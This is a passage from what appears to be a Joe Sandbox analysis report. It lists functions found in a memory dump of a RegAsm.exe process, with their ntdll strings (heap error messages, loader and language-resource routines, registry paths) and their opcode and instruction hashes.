                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                        • API String ID: 0-3178619729
                                                        • Opcode ID: 5ff194374a3431406e88ef52a86d53d4638732c3eb0ebc3a2fbf4373abba735f
                                                        • Instruction ID: 2247405ea40d0d7cc5987262d028781dd6ad43fcf1c0bff160fcce590d7bfa85
                                                        • Opcode Fuzzy Hash: 5ff194374a3431406e88ef52a86d53d4638732c3eb0ebc3a2fbf4373abba735f
                                                        • Instruction Fuzzy Hash: 57E2A070A402559FDB25CF69C490BAEBBF1FF49308F14D1A9E849AB385D734A885CF90
                                                        Function 02E0A3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                        • API String ID: 0-379654539
                                                        • Opcode ID: cf5dedf5754ca0e02111d076411aa69d6ed8883d6850815d50087f0a56dac1c9
                                                        • Instruction ID: e075dc661f368defa44df5e424d35f3caf17e961a482a62978aa56c7eacf0a5b
                                                        • Opcode Fuzzy Hash: cf5dedf5754ca0e02111d076411aa69d6ed8883d6850815d50087f0a56dac1c9
                                                        • Instruction Fuzzy Hash: 47C18F7418838ACFC710DF54C484BAAB7E5BF84748F00E969FA958B390E734C986CB52
                                                        Function 02E10C00 Relevance: 5.3, Strings: 4, Instructions: 260COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        • ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock, xrefs: 02E655AE
                                                        • HEAP[%wZ]: , xrefs: 02E654D1, 02E65592
                                                        • ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock)), xrefs: 02E654ED
                                                        • HEAP: , xrefs: 02E654E0, 02E655A1
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))$HEAP: $HEAP[%wZ]: $ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock
                                                        • API String ID: 0-1657114761
                                                        • Opcode ID: 43dd572cceab2b2d7fc36c783bbeaab895f94f9e2d0d0523dff6a76dfd81e9e9
                                                        • Instruction ID: 5d42385160cd7e22c7f1a958dc517fa9fb16adbdfeafb921b418c9e89bbc03f3
                                                        • Opcode Fuzzy Hash: 43dd572cceab2b2d7fc36c783bbeaab895f94f9e2d0d0523dff6a76dfd81e9e9
                                                        • Instruction Fuzzy Hash: 15A1CF306806059FD724CF24C484BBABBF2EF45308F54E579E89A8B781D731E989CB91
                                                        Function 02E3273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 02E722B6
                                                        • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 02E721D9, 02E722B1
                                                        • SXS: %s() passed the empty activation context, xrefs: 02E721DE
                                                        • .Local, xrefs: 02E328D8
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                        • API String ID: 0-1239276146
                                                        • Opcode ID: c3daba1c5b6612aed26912698318deff0a67dacee6cc85e9cc977c5992ea8dee
                                                        • Instruction ID: 30c2ec72fd2bb05f1c581bfddcb615aba87f259c1870d13134e3da073ddf69de
                                                        • Opcode Fuzzy Hash: c3daba1c5b6612aed26912698318deff0a67dacee6cc85e9cc977c5992ea8dee
                                                        • Instruction Fuzzy Hash: 5BA18031981229DBDB25CF64D888BA9B3B1BF58318F1591E9DE49AB250D7309E81CF90
                                                        Function 02DFF626 Relevance: 5.2, Strings: 4, Instructions: 188COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                                        • API String ID: 0-2586055223
                                                        • Opcode ID: 236c135865f3224269737a27b039133439e9f0cb9593272082e10acadeaf49be
                                                        • Instruction ID: a207663c80f98d16542cf117a35712cf1485f6b75f4108b700016257e842207e
                                                        • Opcode Fuzzy Hash: 236c135865f3224269737a27b039133439e9f0cb9593272082e10acadeaf49be
                                                        • Instruction Fuzzy Hash: F7611232284680AFD721DB24D844F67B7EAEF84718F098469FA958B791DB34DD00CB65
                                                        Function 02EB11A4 Relevance: 5.1, Strings: 4, Instructions: 113COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                                                        • API String ID: 0-336120773
                                                        • Opcode ID: 0a5c67dbc65b1b9f36122e3a6797c014cd262591100f270879d6c48f1e71f1d9
                                                        • Instruction ID: ddd29bc7ae6ef3dd650708c00019c572ed9a8fa99167ee5f3c21005bdb82bca3
                                                        • Opcode Fuzzy Hash: 0a5c67dbc65b1b9f36122e3a6797c014cd262591100f270879d6c48f1e71f1d9
                                                        • Instruction Fuzzy Hash: 6C31E032680500EFE712DB98E895FA777E9EF08728F159455F90DCF290D7209D44EE64
                                                        Function 02DF9148 Relevance: 5.1, Strings: 4, Instructions: 100COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
                                                        • API String ID: 0-1391187441
                                                        • Opcode ID: bb22403f89435a7b079428aa57295e912e44016401a61869ff2d2290e75dcc4c
                                                        • Instruction ID: f8fe1c8d0e40d102e34eea0bd4abaf45cfb99761a06c9b149ad5f3a84e12f7d2
                                                        • Opcode Fuzzy Hash: bb22403f89435a7b079428aa57295e912e44016401a61869ff2d2290e75dcc4c
                                                        • Instruction Fuzzy Hash: 62310132A00114EFEB41DB44D884FEAB7B9EF44728F158066FE11AB391D770ED44CA24
                                                        Function 02E129A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 02E1327D
                                                        • HEAP[%wZ]: , xrefs: 02E13255
                                                        • HEAP: , xrefs: 02E13264
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                        • API String ID: 0-617086771
                                                        • Opcode ID: 35e92daeb973c402c5e439e86a3eab72c50bc7b5ca8f619f8ecfadc0813b9d93
                                                        • Instruction ID: 124cf084854432d553cfa950e2586b57c8ca55c00c1556a555fde31724c3715d
                                                        • Opcode Fuzzy Hash: 35e92daeb973c402c5e439e86a3eab72c50bc7b5ca8f619f8ecfadc0813b9d93
                                                        • Instruction Fuzzy Hash: 0E92BC70A442589FDB25CF68C840BAEBBF1FF48308F14D0A9E95AAB391D734A945CF50
                                                        Function 02E11F92 Relevance: 4.3, Strings: 3, Instructions: 563COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                        • API String ID: 0-3178619729
                                                        • Opcode ID: 066c9f895700768149c85ea8dc06a22aff0d1c2f1290ed84c260402452a8b974
                                                        • Instruction ID: ebea97dab31662f7c3c8b12cd5d2bf9f983a5b08d866a49ac5b8f7fb2008dcbf
                                                        • Opcode Fuzzy Hash: 066c9f895700768149c85ea8dc06a22aff0d1c2f1290ed84c260402452a8b974
                                                        • Instruction Fuzzy Hash: 4D2221706806419FEB24CF28C898B7ABBF6FF05708F14C5A9E9458B382D735D881CB60
                                                        Function 02EA94E0 Relevance: 4.3, Strings: 3, Instructions: 558COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $ $0
                                                        • API String ID: 0-3352262554
                                                        • Opcode ID: 3bbc31e728c01de9173e2033a1c3fa3184d2f1bc86af3d636cac10593994b739
                                                        • Instruction ID: 438c2432e1203d0600207a90fb93eaae94c82cc6777672e5befeb7228f2a30b2
                                                        • Opcode Fuzzy Hash: 3bbc31e728c01de9173e2033a1c3fa3184d2f1bc86af3d636cac10593994b739
                                                        • Instruction Fuzzy Hash: AF3224B16483818FD320CF68C494B9BBBE5BF88308F14992DF5998B252D775E948CB52
                                                        Function 02E10770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                        • API String ID: 0-4253913091
                                                        • Opcode ID: 708db6b6e4a7f5ee564e0beaf3f20b410304db057f4135cb2a1c02781b1db683
                                                        • Instruction ID: 021cb6366ce1abcf3503602a4ac8a319f9bfc0d68988bda17defe31f05d1101e
                                                        • Opcode Fuzzy Hash: 708db6b6e4a7f5ee564e0beaf3f20b410304db057f4135cb2a1c02781b1db683
                                                        • Instruction Fuzzy Hash: DAF18970B80605DFDB15CF68C894BBAB7B6FF85308F1491A9E8169B385D730E981CB90
                                                        Function 02E01460 Relevance: 4.1, Strings: 3, Instructions: 385COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 02E01728
                                                        • HEAP[%wZ]: , xrefs: 02E01712
                                                        • HEAP: , xrefs: 02E01596
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                        • API String ID: 0-3178619729
                                                        • Opcode ID: 7b7c2fccfc51c691b3b57224aeee8013dc954f54b3ae15d198907367a00b2faa
                                                        • Instruction ID: 64227051117378940177c31e1f9438b4398b65e6e9ab7ffeffb0c4ebacf66df3
                                                        • Opcode Fuzzy Hash: 7b7c2fccfc51c691b3b57224aeee8013dc954f54b3ae15d198907367a00b2faa
                                                        • Instruction Fuzzy Hash: 8AE1F230A546419FDB25CF68C491BBABBF1EF49308F18D45DE99A8F285D734E882CB50
                                                        Function 02E0B6C0 Relevance: 4.1, Strings: 3, Instructions: 303COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit$MUI
                                                        • API String ID: 0-1145731471
                                                        • Opcode ID: 8db8c4bb85d5439941c86991a8e715014dd0425e5ebd9aead2f9dca72caecb17
                                                        • Instruction ID: 2c8b2185f89ef95535b4cd769d7c3a0b3d386e395c05a658fa68c61694b63854
                                                        • Opcode Fuzzy Hash: 8db8c4bb85d5439941c86991a8e715014dd0425e5ebd9aead2f9dca72caecb17
                                                        • Instruction Fuzzy Hash: 62B17931A846448BCB25CF69C984BADB7B6BF44B58F18E56DE851EB3C0D730A881CB50
                                                        Function 02E8368C Relevance: 4.0, Strings: 3, Instructions: 292COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: @$DelegatedNtdll$\SystemRoot\system32\
                                                        • API String ID: 0-2391371766
                                                        • Opcode ID: cb816f1f286b9e9ad2b840dc786e45ac8754a17b6b9c49e2d2eec463100eebc6
                                                        • Instruction ID: 4b80f2217de4afc41e6816a7f19dcca3a66c2578ed5b375559c61a6f098f7d4f
                                                        • Opcode Fuzzy Hash: cb816f1f286b9e9ad2b840dc786e45ac8754a17b6b9c49e2d2eec463100eebc6
                                                        • Instruction Fuzzy Hash: D4B1E4716C4341AFE711EF54C880F6BB7E8FB44B18F4099A9FA9997280D771E844CB92
                                                        Function 02E26962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $@
                                                        • API String ID: 0-1077428164
                                                        • Opcode ID: 316ba28cb86e90748107c4b5d14ce41fb0f7ec52a3f2b57a3b7091e69433108f
                                                        • Instruction ID: 361d10c9017d5aa0e4c98813beeaa3ee7bfa8703697e575d5830315cfdd2d202
                                                        • Opcode Fuzzy Hash: 316ba28cb86e90748107c4b5d14ce41fb0f7ec52a3f2b57a3b7091e69433108f
                                                        • Instruction Fuzzy Hash: 46C280716883519FDB25CF24C844BABB7E5AF88748F04E92EF9CA87241D734D848CB52
                                                        Function 02DFA197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: FilterFullPath$UseFilter$\??\
                                                        • API String ID: 0-2779062949
                                                        • Opcode ID: ae39e54f78150db5ebc069093533a0671e1ff63318fb92bcae87e7d468801d56
                                                        • Instruction ID: 2005c7138710f8351a244a83a560ec1fb31bc7aefd47929d766ef156fa39a206
                                                        • Opcode Fuzzy Hash: ae39e54f78150db5ebc069093533a0671e1ff63318fb92bcae87e7d468801d56
                                                        • Instruction Fuzzy Hash: 4EA19B319516289BDB31DF24CC98BEAB7B8EF44704F2091EAEE09A7250D7359E84CF54
                                                        Function 02E936EE Relevance: 4.0, Strings: 3, Instructions: 236COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: @$LdrpResMapFile Enter$LdrpResMapFile Exit
                                                        • API String ID: 0-318774311
                                                        • Opcode ID: 703c7ae7e1ce8e39025c950fdde023035b89f1d2e478853b73a2280d75b8a582
                                                        • Instruction ID: 66cfb70933cc24095a41ea6a97873726b469737b0b8ea5d4f0d9072615a42626
                                                        • Opcode Fuzzy Hash: 703c7ae7e1ce8e39025c950fdde023035b89f1d2e478853b73a2280d75b8a582
                                                        • Instruction Fuzzy Hash: C281CC71688340AFEB20DB14C840B6BB7E9EF84758F0499AAFD819B390D731D800CB62
                                                        Function 02E3909C Relevance: 3.9, Strings: 3, Instructions: 199COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: %$&$@
                                                        • API String ID: 0-1537733988
                                                        • Opcode ID: b3dd02849c0dc5a09ef607fe9cb4a06c6c1501718228923a21ef7a6be8d48bc8
                                                        • Instruction ID: 696078988b18ae384f304919c2275c8a54661edca4ab941f1b5322d6c1f6bec7
                                                        • Opcode Fuzzy Hash: b3dd02849c0dc5a09ef607fe9cb4a06c6c1501718228923a21ef7a6be8d48bc8
                                                        • Instruction Fuzzy Hash: D471DF706887419FC711DF24D588AABBBE6BF84309F50E91DF89A57282C7B0D805CF52
                                                        Function 02EDB73C Relevance: 3.9, Strings: 3, Instructions: 180COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        • TargetNtPath, xrefs: 02EDB82F
                                                        • \Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 02EDB82A
                                                        • GlobalizationUserSettings, xrefs: 02EDB834
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
                                                        • API String ID: 0-505981995
                                                        • Opcode ID: d59adcd706bd98a21104ec3633c1326ab2d33a1e333ff6415efc0aaff414d203
                                                        • Instruction ID: de5c342a7bb2505c08ffe19fa78b876f867f9d0bab33963f2572f9e21ec9fe21
                                                        • Opcode Fuzzy Hash: d59adcd706bd98a21104ec3633c1326ab2d33a1e333ff6415efc0aaff414d203
                                                        • Instruction Fuzzy Hash: 9461D372D81268ABDB31DF54DC88BD9B7B8AF04718F0251E9F908A7250DB749E81CF90
                                                        Function 02DFF7BA Relevance: 3.9, Strings: 3, Instructions: 167COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 02E5E6C6
                                                        • HEAP[%wZ]: , xrefs: 02E5E6A6
                                                        • HEAP: , xrefs: 02E5E6B3
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                                        • API String ID: 0-1340214556
                                                        • Opcode ID: 9ea98ac70b2d1a9fccd44de90763c1597190ff2a713fca27930c6d55e3579c26
                                                        • Instruction ID: f9b985dc5bc5624e7be66ec064e01cc93903caacb43bc46dd560197549263191
                                                        • Opcode Fuzzy Hash: 9ea98ac70b2d1a9fccd44de90763c1597190ff2a713fca27930c6d55e3579c26
                                                        • Instruction Fuzzy Hash: 3C512971640644EFE722DB68C844F96BBF9FF05708F1580A5EA818B792D374EE40CB54
                                                        Function 02EADAAC Relevance: 3.9, Strings: 3, Instructions: 163COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        • HEAP[%wZ]: , xrefs: 02EADC12
                                                        • HEAP: , xrefs: 02EADC1F
                                                        • Heap block at %p modified at %p past requested size of %Ix, xrefs: 02EADC32
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %Ix
                                                        • API String ID: 0-3815128232
                                                        • Opcode ID: 179c4e192e5b3bd56027ba0ff06c5c4c33ee25507bebe31894d9ffe8136ca153
                                                        • Instruction ID: a677b16154791be4767a51695e30d51ba8c4bc59df58e611ecbff51c656ec8f1
                                                        • Opcode Fuzzy Hash: 179c4e192e5b3bd56027ba0ff06c5c4c33ee25507bebe31894d9ffe8136ca153
                                                        • Instruction Fuzzy Hash: 5B5124351811108AE764CA2ACC787F273E2DF45348F54E88AE8D2CFA81D375F846DB20
                                                        Function 02E3C720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        • minkernel\ntdll\ldrinit.c, xrefs: 02E782E8
                                                        • Failed to reallocate the system dirs string !, xrefs: 02E782D7
                                                        • LdrpInitializePerUserWindowsDirectory, xrefs: 02E782DE
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                        • API String ID: 0-1783798831
                                                        • Opcode ID: 2a2f0969b4103ec4096058327317ba81cf99df5d4cc41bdbc860f55473dbfe1c
                                                        • Instruction ID: cce890b1a846fb7c0a5ae70f1d4d439fd498fb9d3ccdf634e9233b0aa78a3c89
                                                        • Opcode Fuzzy Hash: 2a2f0969b4103ec4096058327317ba81cf99df5d4cc41bdbc860f55473dbfe1c
                                                        • Instruction Fuzzy Hash: 764123719C0300ABDB21EB34EC48B5B77E9EF84754F51A82ABE49D3290EB30D850CB91
                                                        Function 02E316CF Relevance: 3.9, Strings: 3, Instructions: 127COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        • TlsVector %p Index %d : %d bytes copied from %p to %p, xrefs: 02E71B39
                                                        • minkernel\ntdll\ldrtls.c, xrefs: 02E71B4A
                                                        • LdrpAllocateTls, xrefs: 02E71B40
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: LdrpAllocateTls$TlsVector %p Index %d : %d bytes copied from %p to %p$minkernel\ntdll\ldrtls.c
                                                        • API String ID: 0-4274184382
                                                        • Opcode ID: 6bccc571f102a933c13bf1b3be15856049c6fd7288fa77f68a3b2cfdf4ddcc81
                                                        • Instruction ID: 2017a205afff6890c60f1d9b05e789506321efe1de25a42550879f21082d0b49
                                                        • Opcode Fuzzy Hash: 6bccc571f102a933c13bf1b3be15856049c6fd7288fa77f68a3b2cfdf4ddcc81
                                                        • Instruction Fuzzy Hash: 8541AF75E80604EFDB15DFA9DC41AAEBBF6FF48704F44A559E40AAB240D774A840CFA0
                                                        Function 02EBC188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        • @, xrefs: 02EBC1F1
                                                        • PreferredUILanguages, xrefs: 02EBC212
                                                        • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 02EBC1C5
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                        • API String ID: 0-2968386058
                                                        • Opcode ID: f7b75c46eb5e133e294765d1820515b974d17cf5e49da27f59811d7e73929ec5
                                                        • Instruction ID: 9e1dfbfe27d91569f91b45150b1e73de0d25c1a8b31f507bfef8822cc058806e
                                                        • Opcode Fuzzy Hash: f7b75c46eb5e133e294765d1820515b974d17cf5e49da27f59811d7e73929ec5
                                                        • Instruction Fuzzy Hash: 0E417171E44609AFDB11DAD4C891BEFB7BDAF14B08F10A06BEA09F7240D7749A44CB60
                                                        Function 02E94144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                        • API String ID: 0-1373925480
                                                        • Opcode ID: ff30dbda44e2db5fed69cbac8ce873d1363dcbb1dbe15084fb2fcc3c791ee016
                                                        • Instruction ID: 354eb6fe1a28a4cc81d9757fad7c917fbaa62f1b1609a9137411584376cb3915
                                                        • Opcode Fuzzy Hash: ff30dbda44e2db5fed69cbac8ce873d1363dcbb1dbe15084fb2fcc3c791ee016
                                                        • Instruction Fuzzy Hash: E74102719802588BEF22DB95C940BADB7BAFF45348F1494AAE805FB7C1D7348902CF20
                                                        Function 02E84755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 02E84888
                                                        • minkernel\ntdll\ldrredirect.c, xrefs: 02E84899
                                                        • LdrpCheckRedirection, xrefs: 02E8488F
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
